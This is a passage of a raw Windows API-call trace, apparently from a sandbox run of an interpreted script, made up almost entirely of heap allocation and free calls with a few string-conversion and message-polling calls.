(HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0141.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0141.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0141.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0141.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0141.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0141.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0141.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0141.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0141.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0141.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0141.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0141.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0141.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0141.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0141.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0141.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0141.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0141.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0141.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0141.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0141.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0141.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0141.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0141.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0141.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0141.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0141.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0141.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0141.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0141.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0141.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0141.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0141.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0141.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0141.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0141.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0141.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0141.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0141.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0141.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0141.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0141.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0141.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0141.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0141.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0141.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0141.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0141.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0141.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0141.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0141.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0141.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0141.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0141.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0141.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0141.946] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0141.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0141.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0141.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0141.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0141.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0141.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0141.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0141.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0141.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0141.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0141.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0141.947] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0141.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0141.947] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0141.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0141.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0141.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0141.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0141.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0141.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0141.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0141.947] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0141.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0141.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0141.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0141.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0141.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0141.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0141.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0141.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0141.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0141.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0141.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0141.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0141.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54db8 [0141.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0141.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0141.948] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0141.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0141.948] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54ed8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0141.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0141.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0141.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0141.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0141.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0141.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0141.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0141.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0141.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0141.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0141.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0141.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0141.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0141.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0141.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0141.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0141.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0141.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0141.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0141.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0141.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0141.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0141.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0141.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0141.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0141.949] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0141.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0141.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0141.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0141.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0141.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0141.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0141.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0141.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0141.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0141.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0141.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0141.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0141.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0141.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0141.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0141.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0141.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54e68 [0141.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0141.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0141.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0141.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0141.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0141.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0141.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0141.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0141.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0141.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0141.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0141.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0141.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c98 [0141.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0141.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0141.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0141.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0141.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0141.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0141.951] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0141.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0141.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0141.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0141.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0141.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cf8 [0141.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0141.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0141.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0141.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0141.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0141.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0141.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0141.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0141.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0141.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0141.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54da8 [0141.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0141.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0141.952] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0141.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0141.952] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54db8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0141.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0141.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0141.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0141.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0141.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0141.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0141.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54ec8 [0141.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0141.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0141.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cf8 | out: hHeap=0x970000) returned 1 [0141.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0141.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0141.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0141.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0141.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0141.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0141.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0141.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0141.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0141.953] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0141.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0141.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0141.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0141.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0141.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ffb8 [0141.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0141.953] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0141.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ffb8 | out: hHeap=0x970000) returned 1 [0141.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0141.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507a0 [0141.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0141.953] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0141.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0141.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0141.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0141.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0141.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0141.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0141.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0141.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0141.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0141.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0141.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0141.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0141.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0141.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0141.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0141.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0141.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0141.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0141.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0141.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0141.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0141.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0141.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0141.955] HeapFree (in: hHeap=0x970000, 